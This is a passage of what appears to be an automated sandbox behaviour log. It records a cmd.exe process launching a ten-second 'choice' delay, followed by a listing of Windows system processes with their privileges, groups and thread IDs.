lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.681] GetProcessHeap () returned 0x6c0000 [0100.681] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xe0) returned 0x6d5250 [0100.681] GetProcessHeap () returned 0x6c0000 [0100.682] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d5250, Size=0x76) returned 0x6d5250 [0100.682] GetProcessHeap () returned 0x6c0000 [0100.682] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d5250) returned 0x76 [0100.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x3beed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3beed8) returned 0x6d52d0 [0100.686] GetProcessHeap () returned 0x6c0000 [0100.686] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x14) returned 0x6c11e8 [0100.686] FindClose (in: hFindFile=0x6d52d0 | out: hFindFile=0x6d52d0) returned 1 [0100.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x3beed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3beed8) returned 0xffffffff [0100.686] GetLastError () returned 0x2 [0100.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x3beed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3beed8) returned 0x6d52d0 [0100.687] GetProcessHeap () returned 0x6c0000 [0100.687] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6c11e8, Size=0x4) returned 0x6c11e8 [0100.687] FindClose (in: hFindFile=0x6d52d0 | out: hFindFile=0x6d52d0) returned 1 [0100.687] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0100.687] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0100.687] GetConsoleTitleW (in: lpConsoleTitle=0x3bf3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0100.687] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bf258, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3bf320 | out: lpAttributeList=0x3bf258, lpSize=0x3bf320) returned 1 [0100.687] UpdateProcThreadAttribute (in: lpAttributeList=0x3bf258, dwFlags=0x0, Attribute=0x60001, lpValue=0x3bf318, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bf258, lpPreviousValue=0x0) returned 1 [0100.687] GetStartupInfoW (in: lpStartupInfo=0x3bf214 | out: lpStartupInfo=0x3bf214*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0100.687] GetProcessHeap () returned 0x6c0000 [0100.687] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x18) returned 0x6d52d0 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0100.687] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0100.688] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0100.688] GetProcessHeap () returned 0x6c0000 [0100.688] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d52d0 | out: hHeap=0x6c0000) returned 1 [0100.688] GetProcessHeap () returned 0x6c0000 [0100.688] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa) returned 0x6cfe30 [0100.688] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0100.690] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3bf2b4*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3bf300 | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x3bf300*(hProcess=0x80, hThread=0x7c, dwProcessId=0x158, dwThreadId=0x330)) returned 1 [0100.700] CloseHandle (hObject=0x7c) returned 1 [0100.700] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.700] GetProcessHeap () returned 0x6c0000 [0100.700] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d3fa8 | out: hHeap=0x6c0000) returned 1 [0100.700] GetEnvironmentStringsW () returned 0x6d3fa8* [0100.700] GetProcessHeap () returned 0x6c0000 [0100.700] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa5a) returned 0x6d20e8 [0100.700] FreeEnvironmentStringsW (penv=0x6d3fa8) returned 1 [0100.700] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) Process: id = "29" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x12e48000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xa4c" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 406 os_tid = 0x330 Process: id = "30" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 407 os_tid = 0x8 Thread: id = 408 os_tid = 0x5c Thread: id = 409 os_tid = 0x34 Thread: id = 410 os_tid = 0x30 Thread: id = 411 os_tid = 0x20 Thread: id = 412 os_tid = 0x9c Thread: id = 413 os_tid = 0x78 Thread: id = 414 os_tid = 0xc0 Thread: id = 415 os_tid = 0x28 Thread: id = 416 os_tid = 0x40 Thread: id = 417 os_tid = 0x44 Thread: id = 418 os_tid = 0x3c Thread: id = 419 os_tid = 0xc4 Thread: id = 420 os_tid = 0xcc Thread: id = 421 os_tid = 0xd0 Thread: id = 422 os_tid = 0xb8 Thread: id = 423 os_tid = 0xd4 Thread: id = 424 os_tid = 0xd8 Thread: id = 425 os_tid = 0xdc Thread: id = 427 os_tid = 0x4c Thread: id = 428 os_tid = 0x80 Thread: id = 429 os_tid = 0x38 Thread: id = 432 os_tid = 0x48 Thread: id = 433 os_tid = 0x2c Thread: id = 434 os_tid = 0xf8 Thread: id = 435 os_tid = 0xfc Thread: id = 436 os_tid = 0x100 Thread: id = 437 os_tid = 0x104 Thread: id = 438 os_tid = 0x108 Thread: id = 439 os_tid = 0x10c Thread: id = 440 os_tid = 0x110 Thread: id = 441 os_tid = 0x84 Thread: id = 442 os_tid = 0x8c Thread: id = 443 os_tid = 0x98 Thread: id = 444 os_tid = 0x60 Thread: id = 445 os_tid = 0x64 Thread: id = 446 os_tid = 0xb4 Thread: id = 447 os_tid = 0xb0 Thread: id = 448 os_tid = 0x50 Thread: id = 452 os_tid = 0x128 Thread: id = 453 os_tid = 0x12c Thread: id = 454 os_tid = 0x130 Thread: id = 455 os_tid = 0x134 Thread: id = 473 os_tid = 0x188 Thread: id = 487 os_tid = 0x90 Thread: id = 494 os_tid = 0x88 Thread: id = 516 os_tid = 0x68 Thread: id = 522 os_tid = 0x74 Thread: id = 527 os_tid = 0x264 Thread: id = 544 os_tid = 0xbc Thread: id = 554 os_tid = 0x2d4 Thread: id = 562 os_tid = 0x2f0 Thread: id = 565 os_tid = 0x1c Thread: id = 605 os_tid = 0x3b0 Thread: id = 624 os_tid = 0x3f0 [0262.102] KeDelayExecutionThread (WaitMode=0x0, Alertable=0, Interval=0xfffff880026065a8*=-1272330929) Thread: id = 629 os_tid = 0x100 Thread: id = 644 os_tid = 0x24 Thread: id = 647 os_tid = 0x1ec Thread: id = 675 os_tid = 0xa0 Thread: id = 689 os_tid = 0x94 Thread: id = 706 os_tid = 0x480 Thread: id = 718 os_tid = 0x484 Thread: id = 721 os_tid = 0x488 Thread: id = 727 os_tid = 0x4e8 Process: id = "31" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2ceca000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 426 os_tid = 0xe4 Thread: id = 430 os_tid = 0xe8 Thread: id = 449 os_tid = 0x114 Thread: id = 460 os_tid = 0x158 Process: id = "32" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2cb4c000" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 431 os_tid = 0xf0 Process: id = "33" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2caa0000" os_pid = "0x118" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 450 os_tid = 0x11c Process: id = "34" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c72d000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x118" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 451 os_tid = 0x124 Thread: id = 456 os_tid = 0x138 Thread: id = 457 os_tid = 0x13c Thread: id = 458 os_tid = 0x140 Thread: id = 459 os_tid = 0x144 Thread: id = 468 os_tid = 0x17c Thread: id = 474 os_tid = 0x190 Thread: id = 475 os_tid = 0x194 Thread: id = 486 os_tid = 0x1cc Process: id = "35" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x29ca7000" os_pid = "0x148" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 461 os_tid = 0x14c Process: id = "36" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x29933000" os_pid = "0x150" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x118" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 462 os_tid = 0x154 Thread: id = 469 os_tid = 0x180 Thread: id = 470 os_tid = 0x184 Thread: id = 476 os_tid = 0x198 Thread: id = 477 os_tid = 0x19c Thread: id = 478 os_tid = 0x1b8 Thread: id = 491 os_tid = 0x1e0 Process: id = "37" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x29cf5000" os_pid = "0x15c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x148" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 463 os_tid = 0x160 Thread: id = 464 os_tid = 0x164 Thread: id = 465 os_tid = 0x168 Thread: id = 466 os_tid = 0x16c Thread: id = 467 os_tid = 0x170 Thread: id = 472 os_tid = 0x18c Thread: id = 484 os_tid = 0x1c4 Thread: id = 485 os_tid = 0x1c8 Process: id = "38" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x297fb000" os_pid = "0x174" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x148" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 471 os_tid = 0x178 Thread: id = 479 os_tid = 0x1bc Thread: id = 480 os_tid = 0x1c0 Thread: id = 545 os_tid = 0x2b4 Thread: id = 563 os_tid = 0x2fc Thread: id = 622 os_tid = 0x3fc Thread: id = 623 os_tid = 0xcc Thread: id = 628 os_tid = 0xfc Process: id = "39" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x28f9d000" os_pid = "0x1a0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x150" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 481 os_tid = 0x1a4 Thread: id = 500 os_tid = 0x1fc Thread: id = 501 os_tid = 0x200 Thread: id = 502 os_tid = 0x204 Thread: id = 503 os_tid = 0x208 Thread: id = 504 os_tid = 0x20c Thread: id = 505 os_tid = 0x210 Thread: id = 506 os_tid = 0x214 Thread: id = 507 os_tid = 0x218 Thread: id = 508 os_tid = 0x21c Thread: id = 509 os_tid = 0x220 Thread: id = 510 os_tid = 0x224 Thread: id = 526 os_tid = 0x260 Thread: id = 625 os_tid = 0xc8 Thread: id = 723 os_tid = 0x4d8 Thread: id = 736 os_tid = 0x510 Thread: id = 744 os_tid = 0x534 Process: id = "40" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x27da3000" os_pid = "0x1a8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x150" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 482 os_tid = 0x1ac Thread: id = 488 os_tid = 0x1d0 Thread: id = 489 os_tid = 0x1d4 Thread: id = 490 os_tid = 0x1d8 Thread: id = 492 os_tid = 0x1dc Thread: id = 493 os_tid = 0x1e4 Thread: id = 495 os_tid = 0x1e8 Thread: id = 496 os_tid = 0x1ec Thread: id = 497 os_tid = 0x1f0 Thread: id = 498 os_tid = 0x1f4 Thread: id = 499 os_tid = 0x1f8 Thread: id = 627 os_tid = 0xec Thread: id = 653 os_tid = 0x378 Process: id = "41" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x277ac000" os_pid = "0x1b0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x150" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 483 os_tid = 0x1b4 Thread: id = 512 os_tid = 0x230 Thread: id = 541 os_tid = 0x2a4 Thread: id = 542 os_tid = 0x2a8 Thread: id = 546 os_tid = 0x2b0 Thread: id = 547 os_tid = 0x2b8 Thread: id = 548 os_tid = 0x2bc Thread: id = 550 os_tid = 0x2c4 Thread: id = 553 os_tid = 0x2d0 Thread: id = 555 os_tid = 0x2d8 Process: id = "42" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x26092000" os_pid = "0x228" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:000070db" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 511 os_tid = 0x22c Thread: id = 513 os_tid = 0x234 Thread: id = 514 os_tid = 0x238 Thread: id = 515 os_tid = 0x23c Thread: id = 517 os_tid = 0x240 Thread: id = 518 os_tid = 0x244 Thread: id = 519 os_tid = 0x248 Thread: id = 520 os_tid = 0x24c Thread: id = 521 os_tid = 0x250 Thread: id = 523 os_tid = 0x254 Thread: id = 524 os_tid = 0x258 Thread: id = 525 os_tid = 0x25c Thread: id = 528 os_tid = 0x268 Thread: id = 530 os_tid = 0x274 Thread: id = 531 os_tid = 0x278 Thread: id = 533 os_tid = 0x280 Thread: id = 571 os_tid = 0x318 Process: id = "43" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x25ac9000" os_pid = "0x26c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b708" [0xc000000f], "LOCAL" [0x7] Thread: id = 529 os_tid = 0x270 Thread: id = 532 os_tid = 0x27c Thread: id = 534 os_tid = 0x284 Thread: id = 535 os_tid = 0x288 Thread: id = 536 os_tid = 0x28c Thread: id = 537 os_tid = 0x290 Thread: id = 538 os_tid = 0x294 Thread: id = 539 os_tid = 0x298 Process: id = "44" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x263d8000" os_pid = "0x29c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9e6" [0xc000000f], "LOCAL" [0x7] Thread: id = 540 os_tid = 0x2a0 Thread: id = 543 os_tid = 0x2ac Thread: id = 549 os_tid = 0x2c0 Thread: id = 551 os_tid = 0x2c8 Thread: id = 552 os_tid = 0x2cc Thread: id = 564 os_tid = 0x300 Thread: id = 570 os_tid = 0x308 Thread: id = 574 os_tid = 0x328 Thread: id = 578 os_tid = 0x338 Thread: id = 579 os_tid = 0x33c Thread: id = 581 os_tid = 0x348 Thread: id = 592 os_tid = 0x374 Thread: id = 593 os_tid = 0x378 Thread: id = 594 os_tid = 0x37c Thread: id = 597 os_tid = 0x38c Thread: id = 598 os_tid = 0x390 Thread: id = 656 os_tid = 0x3fc Thread: id = 663 os_tid = 0x110 Thread: id = 667 os_tid = 0xf8 Thread: id = 670 os_tid = 0x128 Thread: id = 674 os_tid = 0x410 Thread: id = 677 os_tid = 0x418 Thread: id = 746 os_tid = 0x53c Thread: id = 753 os_tid = 0x558 Process: id = "45" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x263fd000" os_pid = "0x2dc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x174" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 556 os_tid = 0x2e0 Thread: id = 557 os_tid = 0x2e4 Thread: id = 558 os_tid = 0x2e8 Thread: id = 559 os_tid = 0x2ec Thread: id = 560 os_tid = 0x2f4 Thread: id = 561 os_tid = 0x2f8 Thread: id = 566 os_tid = 0x304 Thread: id = 567 os_tid = 0x30c Thread: id = 568 os_tid = 0x310 Thread: id = 569 os_tid = 0x314 Thread: id = 708 os_tid = 0x49c Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x22edf000" os_pid = "0x31c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ce9d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 572 os_tid = 0x320 Thread: id = 573 os_tid = 0x324 Thread: id = 575 os_tid = 0x32c Thread: id = 576 os_tid = 0x330 Thread: id = 577 os_tid = 0x334 Thread: id = 582 os_tid = 0x34c Thread: id = 583 os_tid = 0x350 Thread: id = 585 